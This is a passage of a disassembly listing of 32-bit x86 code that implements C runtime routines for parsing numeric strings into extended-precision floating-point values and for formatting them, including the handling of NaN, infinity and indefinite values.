; ---------------------------------------------------------------------------

loc_412A55:				; CODE XREF: sub_4129AD+A0j
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jnz	short loc_412A6B

loc_412A66:				; CODE XREF: sub_4129AD+15Fj
		push	5

loc_412A68:				; CODE XREF: sub_4129AD+10Cj
					; sub_4129AD+138j ...
		pop	ecx
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A6B:				; CODE XREF: sub_4129AD+B7j
		movsx	eax, al
		sub	eax, 2Bh
		jz	short loc_412A90
		dec	eax
		dec	eax
		jz	short loc_412A84
		sub	eax, 3
		jnz	loc_412C0B

loc_412A80:				; CODE XREF: sub_4129AD+118j
					; sub_4129AD+167j
		mov	ecx, esi
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A84:				; CODE XREF: sub_4129AD+C8j
		push	2
		pop	ecx
		mov	[ebp+var_74], 8000h
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A90:				; CODE XREF: sub_4129AD+C4j
		and	[ebp+var_74], 0
		push	2
		pop	ecx
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A99:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 1
		sub	cl, 31h
		cmp	cl, 8
		mov	[ebp+var_58], esi
		jbe	short loc_412A4F
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jnz	short loc_412ABB

loc_412AB7:				; CODE XREF: sub_4129AD+1A7j
		push	4
		jmp	short loc_412A68
; ---------------------------------------------------------------------------

loc_412ABB:				; CODE XREF: sub_4129AD+108j
		cmp	al, 2Bh
		jz	short loc_412AE7
		cmp	al, 2Dh
		jz	short loc_412AE7
		cmp	al, bl
		jz	short loc_412A80

loc_412AC7:				; CODE XREF: sub_4129AD+1B5j
		cmp	al, 43h
		jle	loc_412C0B
		cmp	al, 45h
		jle	short loc_412AE3
		cmp	al, 63h
		jle	loc_412C0B
		cmp	al, 65h
		jg	loc_412C0B

loc_412AE3:				; CODE XREF: sub_4129AD+124j
		push	6
		jmp	short loc_412A68
; ---------------------------------------------------------------------------

loc_412AE7:				; CODE XREF: sub_4129AD+110j
					; sub_4129AD+114j ...
		dec	edx
		push	0Bh
		jmp	loc_412A68
; ---------------------------------------------------------------------------

loc_412AEF:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 2
		sub	cl, 31h
		cmp	cl, 8
		jbe	loc_412A4F
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jz	loc_412A66
		cmp	al, bl
		jz	loc_412A80

loc_412B1A:				; CODE XREF: sub_4129AD+1F9j
					; sub_4129AD:loc_412BD9j
		mov	edx, [ebp+var_54]
		jmp	loc_412C36
; ---------------------------------------------------------------------------

loc_412B22:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	[ebp+var_58], esi ; jumptable 00412A3E case 3
		jmp	short loc_412B41
; ---------------------------------------------------------------------------

loc_412B27:				; CODE XREF: sub_4129AD+196j
		cmp	al, 39h
		jg	short loc_412B45
		cmp	[ebp+var_4C], 19h
		jnb	short loc_412B3B
		inc	[ebp+var_4C]
		sub	al, bl
		mov	[edi], al
		inc	edi
		jmp	short loc_412B3E
; ---------------------------------------------------------------------------

loc_412B3B:				; CODE XREF: sub_4129AD+182j
		inc	[ebp+var_50]

loc_412B3E:				; CODE XREF: sub_4129AD+18Cj
		mov	al, [edx]
		inc	edx

loc_412B41:				; CODE XREF: sub_4129AD+178j
		cmp	al, bl
		jge	short loc_412B27

loc_412B45:				; CODE XREF: sub_4129AD+17Cj
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jz	loc_412AB7

loc_412B5A:				; CODE XREF: sub_4129AD+1D6j
					; sub_4129AD+1F0j
		cmp	al, 2Bh
		jz	short loc_412AE7
		cmp	al, 2Dh
		jz	short loc_412AE7
		jmp	loc_412AC7
; ---------------------------------------------------------------------------

loc_412B67:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		cmp	[ebp+var_4C], 0	; jumptable 00412A3E case 4
		mov	[ebp+var_58], esi
		mov	[ebp+var_5C], esi
		jnz	short loc_412B99
		jmp	short loc_412B7B
; ---------------------------------------------------------------------------

loc_412B75:				; CODE XREF: sub_4129AD+1D0j
		dec	[ebp+var_50]
		mov	al, [edx]
		inc	edx

loc_412B7B:				; CODE XREF: sub_4129AD+1C6j
		cmp	al, bl
		jz	short loc_412B75
		jmp	short loc_412B99
; ---------------------------------------------------------------------------

loc_412B81:				; CODE XREF: sub_4129AD+1EEj
		cmp	al, 39h
		jg	short loc_412B5A
		cmp	[ebp+var_4C], 19h
		jnb	short loc_412B96
		inc	[ebp+var_4C]
		sub	al, bl
		mov	[edi], al
		inc	edi
		dec	[ebp+var_50]

loc_412B96:				; CODE XREF: sub_4129AD+1DCj
		mov	al, [edx]
		inc	edx

loc_412B99:				; CODE XREF: sub_4129AD+1C4j
					; sub_4129AD+1D2j
		cmp	al, bl
		jge	short loc_412B81
		jmp	short loc_412B5A
; ---------------------------------------------------------------------------

loc_412B9F:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		sub	al, bl		; jumptable 00412A3E case 5
		cmp	al, 9
		mov	[ebp+var_5C], esi
		ja	loc_412B1A
		push	4
		jmp	loc_412A51
; ---------------------------------------------------------------------------

loc_412BB3:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		lea	ecx, [edx-2]	; jumptable 00412A3E case 6
		mov	[ebp+var_54], ecx
		mov	cl, al
		sub	cl, 31h
		cmp	cl, 8
		ja	short loc_412BCA

loc_412BC3:				; CODE XREF: sub_4129AD+25Cj
					; sub_4129AD+269j
		push	9
		jmp	loc_412A51
; ---------------------------------------------------------------------------

loc_412BCA:				; CODE XREF: sub_4129AD+214j
		movsx	eax, al
		sub	eax, 2Bh
		jz	short loc_412BF2
		dec	eax
		dec	eax
		jz	short loc_412BE6
		sub	eax, 3

loc_412BD9:				; CODE XREF: sub_4129AD+26Dj
		jnz	loc_412B1A
		push	8
		jmp	loc_412A68
; ---------------------------------------------------------------------------

loc_412BE6:				; CODE XREF: sub_4129AD+227j
					; sub_4129AD+285j
		or	[ebp+var_68], 0FFFFFFFFh
		push	7
		pop	ecx
		jmp	loc_412A32
; ---------------------------------------------------------------------------

loc_412BF2:				; CODE XREF: sub_4129AD+223j
					; sub_4129AD+281j
		push	7
		jmp	loc_412A68
; ---------------------------------------------------------------------------

loc_412BF9:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	[ebp+var_60], esi ; jumptable 00412A3E case 8
		jmp	short loc_412C01
; ---------------------------------------------------------------------------

loc_412BFE:				; CODE XREF: sub_4129AD+256j
		mov	al, [edx]
		inc	edx

loc_412C01:				; CODE XREF: sub_4129AD+24Fj
		cmp	al, bl
		jz	short loc_412BFE
		sub	al, 31h
		cmp	al, 8
		jbe	short loc_412BC3

loc_412C0B:				; CODE XREF: sub_4129AD+CDj
					; sub_4129AD+11Cj ...
		dec	edx
		jmp	short loc_412C36
; ---------------------------------------------------------------------------

loc_412C0E:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 7
		sub	cl, 31h
		cmp	cl, 8
		jbe	short loc_412BC3
		cmp	al, bl
		jmp	short loc_412BD9
; ---------------------------------------------------------------------------

loc_412C1C:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		cmp	[ebp+arg_18], 0	; jumptable 00412A3E case 11
		jz	short loc_412C69
		movsx	eax, al
		sub	eax, 2Bh
		lea	ecx, [edx-1]
		mov	[ebp+var_54], ecx
		jz	short loc_412BF2
		dec	eax
		dec	eax
		jz	short loc_412BE6
		mov	edx, ecx

loc_412C36:				; CODE XREF: sub_4129AD+170j
					; sub_4129AD+25Fj ...
		cmp	[ebp+var_58], 0
		mov	eax, [ebp+var_70]
		mov	[eax], edx
		jz	loc_412FEA
		push	18h
		pop	eax
		cmp	[ebp+var_4C], eax
		jbe	short loc_412C5D
		cmp	[ebp+var_9], 5
		jl	short loc_412C56
		inc	[ebp+var_9]

loc_412C56:				; CODE XREF: sub_4129AD+2A4j
		dec	edi
		inc	[ebp+var_50]
		mov	[ebp+var_4C], eax

loc_412C5D:				; CODE XREF: sub_4129AD+29Ej
		cmp	[ebp+var_4C], 0
		jbe	loc_413011
		jmp	short loc_412CC2
; ---------------------------------------------------------------------------

loc_412C69:				; CODE XREF: sub_4129AD+273j
		push	0Ah
		pop	ecx
		dec	edx

loc_412C6D:				; CODE XREF: sub_4129AD+8Bj
					; sub_4129AD+91j
					; DATA XREF: ...
		cmp	ecx, 0Ah	; default
					; jumptable 00412A3E case 10
		jnz	loc_412A32
		jmp	short loc_412C36
; ---------------------------------------------------------------------------

loc_412C78:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	[ebp+var_60], esi ; jumptable 00412A3E case 9
		xor	ecx, ecx
		jmp	short loc_412C98
; ---------------------------------------------------------------------------

loc_412C7F:				; CODE XREF: sub_4129AD+2EDj
		cmp	al, 39h
		jg	short loc_412CA3
		imul	ecx, 0Ah
		movsx	esi, al
		lea	ecx, [ecx+esi-30h]
		cmp	ecx, 1450h
		jg	short loc_412C9E
		mov	al, [edx]
		inc	edx

loc_412C98:				; CODE XREF: sub_4129AD+2D0j
		cmp	al, bl
		jge	short loc_412C7F
		jmp	short loc_412CA3
; ---------------------------------------------------------------------------

loc_412C9E:				; CODE XREF: sub_4129AD+2E6j
		mov	ecx, 1451h

loc_412CA3:				; CODE XREF: sub_4129AD+2D4j
					; sub_4129AD+2EFj
		mov	[ebp+var_64], ecx
		jmp	short loc_412CB3
; ---------------------------------------------------------------------------

loc_412CA8:				; CODE XREF: sub_4129AD+308j
		cmp	al, 39h
		jg	loc_412C0B
		mov	al, [edx]
		inc	edx

loc_412CB3:				; CODE XREF: sub_4129AD+2F9j
		cmp	al, bl
		jge	short loc_412CA8
		jmp	loc_412C0B
; ---------------------------------------------------------------------------

loc_412CBC:				; CODE XREF: sub_4129AD+319j
		dec	[ebp+var_4C]
		inc	[ebp+var_50]

loc_412CC2:				; CODE XREF: sub_4129AD+2BAj
		dec	edi
		cmp	byte ptr [edi],	0
		jz	short loc_412CBC
		lea	eax, [ebp+var_3C]
		push	eax
		push	[ebp+var_4C]
		lea	eax, [ebp+var_20]
		push	eax
		call	sub_413D6A
		mov	eax, [ebp+var_64]
		xor	ecx, ecx
		add	esp, 0Ch
		cmp	[ebp+var_68], ecx
		jge	short loc_412CE7
		neg	eax

loc_412CE7:				; CODE XREF: sub_4129AD+336j
		add	eax, [ebp+var_50]
		cmp	[ebp+var_60], ecx
		jnz	short loc_412CF2
		add	eax, [ebp+arg_10]

loc_412CF2:				; CODE XREF: sub_4129AD+340j
		cmp	[ebp+var_5C], ecx
		jnz	short loc_412CFA
		sub	eax, [ebp+arg_14]

loc_412CFA:				; CODE XREF: sub_4129AD+348j
		cmp	eax, 1450h
		jg	loc_412FF3
		cmp	eax, 0FFFFEBB0h
		jl	loc_41300A
		mov	esi, offset dword_425260
		sub	esi, 60h
		cmp	eax, ecx
		mov	[ebp+var_54], eax
		jz	loc_412FD8
		jge	short loc_412D32
		neg	eax
		mov	esi, offset dword_4253C0
		mov	[ebp+var_54], eax
		sub	esi, 60h

loc_412D32:				; CODE XREF: sub_4129AD+376j
		cmp	[ebp+arg_C], ecx
		jnz	short loc_412D3B
		mov	word ptr [ebp+var_3C], cx

loc_412D3B:				; CODE XREF: sub_4129AD+388j
		cmp	[ebp+var_54], ecx
		jz	loc_412FD8

loc_412D44:				; CODE XREF: sub_4129AD+625j
		mov	eax, [ebp+var_54]
		sar	[ebp+var_54], 3
		add	esi, 54h
		and	eax, 7
		test	eax, eax
		mov	[ebp+var_4C], esi
		jz	loc_412FCE
		imul	eax, 0Ch
		add	eax, esi
		mov	ebx, eax
		cmp	word ptr [ebx],	8000h
		mov	[ebp+var_70], ebx
		jb	short loc_412D81
		mov	esi, ebx
		lea	edi, [ebp+var_48]
		movsd
		movsd
		movsd
		dec	[ebp+var_46]
		mov	esi, [ebp+var_4C]
		lea	ebx, [ebp+var_48]
		mov	[ebp+var_70], ebx

loc_412D81:				; CODE XREF: sub_4129AD+3BEj
		movzx	edx, word ptr [ebx+0Ah]
		mov	ecx, [ebp+var_32]
		xor	eax, eax
		mov	[ebp+var_50], eax
		mov	[ebp+var_2C], eax
		mov	[ebp+var_28], eax
		mov	[ebp+var_24], eax
		mov	eax, edx
		mov	edi, 7FFFh
		xor	eax, ecx
		and	ecx, edi
		and	edx, edi
		and	eax, 8000h
		cmp	cx, 7FFFh
		lea	edi, [edx+ecx]
		movzx	edi, di
		jnb	loc_412FB4
		cmp	dx, 7FFFh
		jnb	loc_412FB4
		cmp	di, 0BFFDh
		ja	loc_412FB4
		cmp	di, 3FBFh
		ja	short loc_412DE3
		xor	eax, eax
		mov	[ebp+var_38], eax
		mov	[ebp+var_3C], eax
		jmp	loc_412FCB
; ---------------------------------------------------------------------------

loc_412DE3:				; CODE XREF: sub_4129AD+427j
		test	cx, cx
		jnz	short loc_412E07
		inc	edi
		test	dword ptr [ebp-34h], 7FFFFFFFh
		jnz	short loc_412E07
		cmp	[ebp+var_38], 0
		jnz	short loc_412E07
		cmp	[ebp+var_3C], 0
		jnz	short loc_412E07
		and	word ptr [ebp+var_32], cx
		jmp	loc_412FCE
; ---------------------------------------------------------------------------

loc_412E07:				; CODE XREF: sub_4129AD+439j
					; sub_4129AD+443j ...
		xor	ecx, ecx
		cmp	dx, cx
		jnz	short loc_412E2F
		inc	edi
		test	dword ptr [ebx+8], 7FFFFFFFh
		jnz	short loc_412E2F
		cmp	[ebx+4], ecx
		jnz	short loc_412E2F
		cmp	[ebx], ecx
		jnz	short loc_412E2F
		mov	[ebp-34h], ecx
		mov	[ebp+var_38], ecx
		mov	[ebp+var_3C], ecx
		jmp	loc_412FCE
; ---------------------------------------------------------------------------

loc_412E2F:				; CODE XREF: sub_4129AD+45Fj
					; sub_4129AD+469j ...
		and	[ebp+var_68], ecx
		lea	esi, [ebp+var_28]
		mov	[ebp+var_58], 5

loc_412E3C:				; CODE XREF: sub_4129AD+4FFj
		mov	ecx, [ebp+var_68]
		mov	edx, [ebp+var_58]
		add	ecx, ecx
		test	edx, edx
		mov	[ebp+var_64], edx
		jle	short loc_412EA0
		lea	ecx, [ebp+ecx+var_3C]
		add	ebx, 8
		mov	[ebp+var_5C], ecx
		mov	[ebp+var_60], ebx

loc_412E58:				; CODE XREF: sub_4129AD+4EEj
		mov	ecx, [ebp+var_60]
		mov	edx, [ebp+var_5C]
		movzx	edx, word ptr [edx]
		movzx	ecx, word ptr [ecx]
		and	[ebp+var_78], 0
		imul	ecx, edx
		mov	edx, [esi-4]
		lea	ebx, [edx+ecx]
		cmp	ebx, edx
		jb	short loc_412E79
		cmp	ebx, ecx
		jnb	short loc_412E80

loc_412E79:				; CODE XREF: sub_4129AD+4C6j
		mov	[ebp+var_78], 1

loc_412E80:				; CODE XREF: sub_4129AD+4CAj
		cmp	[ebp+var_78], 0
		mov	[esi-4], ebx
		jz	short loc_412E8C
		inc	word ptr [esi]

loc_412E8C:				; CODE XREF: sub_4129AD+4DAj
		add	[ebp+var_5C], 2
		sub	[ebp+var_60], 2
		dec	[ebp+var_64]
		cmp	[ebp+var_64], 0
		jg	short loc_412E58
		mov	ebx, [ebp+var_70]

loc_412EA0:				; CODE XREF: sub_4129AD+49Cj
		inc	esi
		inc	esi
		inc	[ebp+var_68]
		dec	[ebp+var_58]
		cmp	[ebp+var_58], 0
		jg	short loc_412E3C
		add	edi, 0C002h
		test	di, di
		jle	short loc_412EF4

loc_412EB9:				; CODE XREF: sub_4129AD+540j
		test	[ebp+var_24], 80000000h
		jnz	short loc_412EEF
		mov	esi, [ebp+var_28]
		mov	ecx, [ebp+var_2C]
		shl	[ebp+var_2C], 1
		shr	ecx, 1Fh
		mov	edx, esi
		add	esi, esi
		or	esi, ecx
		mov	ecx, [ebp+var_24]
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		add	edi, 0FFFFh
		test	di, di
		mov	[ebp+var_28], esi
		mov	[ebp+var_24], ecx
		jg	short loc_412EB9

loc_412EEF:				; CODE XREF: sub_4129AD+513j
		test	di, di
		jg	short loc_412F42

loc_412EF4:				; CODE XREF: sub_4129AD+50Aj
		add	edi, 0FFFFh
		test	di, di
		jge	short loc_412F42
		mov	ecx, edi
		neg	ecx
		movzx	esi, cx
		add	edi, esi

loc_412F08:				; CODE XREF: sub_4129AD+588j
		test	byte ptr [ebp+var_2C], 1
		jz	short loc_412F11
		inc	[ebp+var_50]

loc_412F11:				; CODE XREF: sub_4129AD+55Fj
		mov	ecx, [ebp+var_24]
		mov	ebx, [ebp+var_28]
		mov	edx, [ebp+var_28]
		shr	[ebp+var_24], 1
		shl	ecx, 1Fh
		shr	ebx, 1
		or	ebx, ecx
		mov	ecx, [ebp+var_2C]
		shl	edx, 1Fh
		shr	ecx, 1
		or	ecx, edx
		dec	esi
		mov	[ebp+var_28], ebx
		mov	[ebp+var_2C], ecx
		jnz	short loc_412F08
		cmp	[ebp+var_50], 0
		jz	short loc_412F42
		or	word ptr [ebp+var_2C], 1

loc_412F42:				; CODE XREF: sub_4129AD+545j
					; sub_4129AD+550j ...
		cmp	word ptr [ebp+var_2C], 8000h
		ja	short loc_412F5B
		mov	ecx, [ebp+var_2C]
		and	ecx, 1FFFFh
		cmp	ecx, 18000h
		jnz	short loc_412F8E

loc_412F5B:				; CODE XREF: sub_4129AD+59Bj
		cmp	[ebp+var_2C+2],	0FFFFFFFFh
		jnz	short loc_412F8B
		and	[ebp+var_2C+2],	0
		cmp	[ebp+var_28+2],	0FFFFFFFFh
		jnz	short loc_412F86
		and	[ebp+var_28+2],	0
		cmp	word ptr [ebp+var_24+2], 0FFFFh
		jnz	short loc_412F80
		mov	word ptr [ebp+var_24+2], 8000h
		inc	edi
		jmp	short loc_412F8E
; ---------------------------------------------------------------------------

loc_412F80:				; CODE XREF: sub_4129AD+5C8j
		inc	word ptr [ebp+var_24+2]
		jmp	short loc_412F8E
; ---------------------------------------------------------------------------

loc_412F86:				; CODE XREF: sub_4129AD+5BCj
		inc	[ebp+var_28+2]
		jmp	short loc_412F8E
; ---------------------------------------------------------------------------

loc_412F8B:				; CODE XREF: sub_4129AD+5B2j
		inc	[ebp+var_2C+2]

loc_412F8E:				; CODE XREF: sub_4129AD+5ACj
					; sub_4129AD+5D1j ...
		cmp	di, 7FFFh
		mov	esi, [ebp+var_4C]
		jnb	short loc_412FB4
		mov	cx, word ptr [ebp+var_2C+2]
		mov	word ptr [ebp+var_3C], cx
		mov	ecx, [ebp+var_28]
		mov	[ebp+var_3C+2],	ecx
		mov	ecx, [ebp+var_24]
		or	edi, eax
		mov	[ebp+var_38+2],	ecx
		mov	word ptr [ebp+var_32], di
		jmp	short loc_412FCE
; ---------------------------------------------------------------------------

loc_412FB4:				; CODE XREF: sub_4129AD+406j
					; sub_4129AD+411j ...
		neg	ax
		sbb	eax, eax
		and	[ebp+var_38], 0
		and	eax, 80000000h
		add	eax, 7FFF8000h
		and	[ebp+var_3C], 0

loc_412FCB:				; CODE XREF: sub_4129AD+431j
		mov	[ebp-34h], eax

loc_412FCE:				; CODE XREF: sub_4129AD+3A9j
					; sub_4129AD+455j ...
		cmp	[ebp+var_54], 0
		jnz	loc_412D44

loc_412FD8:				; CODE XREF: sub_4129AD+370j
					; sub_4129AD+391j
		mov	eax, [ebp-34h]
		movzx	ecx, word ptr [ebp+var_3C]
		mov	esi, [ebp+var_3C+2]
		mov	edx, [ebp+var_38+2]
		shr	eax, 10h
		jmp	short loc_413019
; ---------------------------------------------------------------------------

loc_412FEA:				; CODE XREF: sub_4129AD+292j
		mov	[ebp+var_6C], 4
		jmp	short loc_413011
; ---------------------------------------------------------------------------

loc_412FF3:				; CODE XREF: sub_4129AD+352j
		xor	esi, esi
		mov	eax, 7FFFh
		mov	edx, 80000000h
		xor	ecx, ecx
		mov	[ebp+var_6C], 2
		jmp	short loc_413019
; ---------------------------------------------------------------------------

loc_41300A:				; CODE XREF: sub_4129AD+35Dj
		mov	[ebp+var_6C], 1

loc_413011:				; CODE XREF: sub_4129AD+2B4j
					; sub_4129AD+644j
		xor	ecx, ecx
		xor	eax, eax
		xor	edx, edx
		xor	esi, esi

loc_413019:				; CODE XREF: sub_4129AD+63Bj
					; sub_4129AD+65Bj
		mov	edi, [ebp+var_7C]
		or	eax, [ebp+var_74]
		mov	[edi], cx
		mov	[edi+0Ah], ax
		mov	eax, [ebp+var_6C]
		mov	[edi+2], esi
		mov	[edi+6], edx

loc_41302F:				; CODE XREF: sub_4129AD+63j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_4129AD	endp

; ---------------------------------------------------------------------------
		db 8Dh,	49h, 0
off_413041	dd offset loc_412A45	; DATA XREF: sub_4129AD+91r
		dd offset loc_412A99	; jump table for switch	statement
		dd offset loc_412AEF
		dd offset loc_412B22
		dd offset loc_412B67
		dd offset loc_412B9F
		dd offset loc_412BB3
		dd offset loc_412C0E
		dd offset loc_412BF9
		dd offset loc_412C78
		dd offset loc_412C6D
		dd offset loc_412C1C

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413071	proc near		; CODE XREF: sub_411D31+3Fp

var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1A		= dword	ptr -1Ah
var_16		= dword	ptr -16h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 74h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_14]
		push	esi
		push	edi
		lea	esi, [ebp+arg_0]
		lea	edi, [ebp+var_10]
		movsd
		movsd
		movsw
		mov	edx, [ebp+var_8]
		mov	ecx, edx
		mov	eax, 8000h
		and	ecx, eax
		and	edx, 7FFFh
		test	cx, cx
		mov	[ebp+var_60], ebx
		mov	byte ptr [ebp+var_30], 0CCh
		mov	byte ptr [ebp+var_30+1], 0CCh
		mov	byte ptr [ebp+var_30+2], 0CCh
		mov	byte ptr [ebp+var_30+3], 0CCh
		mov	byte ptr [ebp+var_2C], 0CCh
		mov	byte ptr [ebp+var_2C+1], 0CCh
		mov	byte ptr [ebp+var_2C+2], 0CCh
		mov	byte ptr [ebp+var_2C+3], 0CCh
		mov	byte ptr [ebp+var_28], 0CCh
		mov	byte ptr [ebp+var_28+1], 0CCh
		mov	byte ptr [ebp+var_28+2], 0FBh
		mov	byte ptr [ebp+var_28+3], 3Fh
		mov	[ebp+var_74], 1
		mov	[ebp+var_6C], ecx
		jz	short loc_4130EB
		mov	byte ptr [ebx+2], 2Dh
		jmp	short loc_4130EF
; ---------------------------------------------------------------------------

loc_4130EB:				; CODE XREF: sub_413071+72j
		mov	byte ptr [ebx+2], 20h

loc_4130EF:				; CODE XREF: sub_413071+78j
		test	dx, dx
		mov	esi, [ebp+var_C]
		mov	edi, [ebp+var_10]
		jnz	short loc_413128
		test	esi, esi
		jnz	short loc_413128
		test	edi, edi
		jnz	short loc_413128
		and	[ebx], di
		cmp	cx, ax
		setnz	al
		dec	al
		and	al, 0Dh
		add	al, 20h
		mov	[ebx+2], al
		mov	byte ptr [ebx+3], 1
		mov	byte ptr [ebx+4], 30h
		mov	byte ptr [ebx+5], 0

loc_413120:				; CODE XREF: sub_413071+6FBj
					; sub_413071+8C3j
		xor	eax, eax
		inc	eax
		jmp	loc_4138F1
; ---------------------------------------------------------------------------

loc_413128:				; CODE XREF: sub_413071+87j
					; sub_413071+8Bj ...
		cmp	dx, 7FFFh
		jnz	loc_4131D1
		mov	eax, 80000000h
		cmp	esi, eax
		mov	word ptr [ebx],	1
		jnz	short loc_413145
		test	edi, edi
		jz	short loc_413154

loc_413145:				; CODE XREF: sub_413071+CEj
		test	esi, 40000000h
		jnz	short loc_413154
		push	offset a1Snan	; "1#SNAN"
		jmp	short loc_4131A5
; ---------------------------------------------------------------------------

loc_413154:				; CODE XREF: sub_413071+D2j
					; sub_413071+DAj
		test	cx, cx
		jz	short loc_41316C
		cmp	esi, 0C0000000h
		jnz	short loc_41316C
		test	edi, edi
		jnz	short loc_4131A0
		push	offset a1Ind	; "1#IND"
		jmp	short loc_413179
; ---------------------------------------------------------------------------

loc_41316C:				; CODE XREF: sub_413071+E6j
					; sub_413071+EEj
		cmp	esi, eax
		jnz	short loc_4131A0
		test	edi, edi
		jnz	short loc_4131A0
		push	offset a1Inf	; "1#INF"

loc_413179:				; CODE XREF: sub_413071+F9j
		lea	eax, [ebx+4]
		push	16h
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		xor	esi, esi
		test	eax, eax
		jz	short loc_41319A
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_41319A:				; CODE XREF: sub_413071+11Aj
		mov	byte ptr [ebx+3], 5
		jmp	short loc_4131CA
; ---------------------------------------------------------------------------

loc_4131A0:				; CODE XREF: sub_413071+F2j
					; sub_413071+FDj ...
		push	offset a1Qnan	; "1#QNAN"

loc_4131A5:				; CODE XREF: sub_413071+E1j
		lea	eax, [ebx+4]
		push	16h
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		xor	esi, esi
		test	eax, eax
		jz	short loc_4131C6
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_4131C6:				; CODE XREF: sub_413071+146j
		mov	byte ptr [ebx+3], 6

loc_4131CA:				; CODE XREF: sub_413071+12Dj
		xor	eax, eax
		jmp	loc_4138F1
; ---------------------------------------------------------------------------

loc_4131D1:				; CODE XREF: sub_413071+BCj
		movzx	ecx, dx
		mov	ebx, ecx
		imul	ecx, 4D10h
		shr	ebx, 8
		mov	eax, esi
		shr	eax, 18h
		lea	eax, [ebx+eax*2]
		imul	eax, 4Dh
		lea	eax, [eax+ecx-134312F4h]
		sar	eax, 10h
		movzx	ecx, ax
		movsx	ebx, cx
		mov	[ebp+var_4C], ecx
		xor	eax, eax
		mov	ecx, offset dword_425260
		neg	ebx
		sub	ecx, 60h
		cmp	ebx, eax
		mov	word ptr [ebp+var_16], dx
		mov	[ebp+var_1A], esi
		mov	[ebp+var_20+2],	edi
		mov	word ptr [ebp+var_20], ax
		mov	[ebp+var_68], ecx
		jz	loc_4134D0
		jge	short loc_413231
		mov	ecx, offset dword_4253C0
		neg	ebx
		sub	ecx, 60h
		mov	[ebp+var_68], ecx

loc_413231:				; CODE XREF: sub_413071+1B1j
		cmp	ebx, eax
		jz	loc_4134D0

loc_413239:				; CODE XREF: sub_413071+457j
		add	[ebp+var_68], 54h
		mov	ecx, ebx
		and	ecx, 7
		sar	ebx, 3
		test	ecx, ecx
		jz	loc_4134C6
		imul	ecx, 0Ch
		add	ecx, [ebp+var_68]
		cmp	word ptr [ecx],	8000h
		mov	[ebp+var_64], ecx
		jb	short loc_413270
		mov	esi, ecx
		lea	edi, [ebp+var_3C]
		movsd
		movsd
		lea	eax, [ebp+var_3C]
		movsd
		dec	[ebp+var_3C+2]
		mov	[ebp+var_64], eax
		mov	ecx, eax

loc_413270:				; CODE XREF: sub_413071+1EAj
		movzx	edi, word ptr [ecx+0Ah]
		mov	edx, [ebp+var_16]
		xor	eax, eax
		mov	ecx, edi
		mov	esi, 7FFFh
		xor	ecx, edx
		and	edx, esi
		and	edi, esi
		mov	[ebp+var_48], eax
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		and	ecx, 8000h
		cmp	dx, si
		lea	eax, [edi+edx]
		movzx	eax, ax
		jnb	loc_4134AA
		cmp	di, si
		jnb	loc_4134AA
		cmp	ax, 0BFFDh
		ja	loc_4134AA
		cmp	ax, 3FBFh
		ja	short loc_4132D0
		xor	eax, eax
		mov	[ebp+var_1A+2],	eax
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax
		jmp	loc_4134C6
; ---------------------------------------------------------------------------

loc_4132D0:				; CODE XREF: sub_413071+24Dj
		xor	esi, esi
		cmp	dx, si
		jnz	short loc_4132F4
		inc	eax
		test	[ebp+var_1A+2],	7FFFFFFFh
		jnz	short loc_4132F4
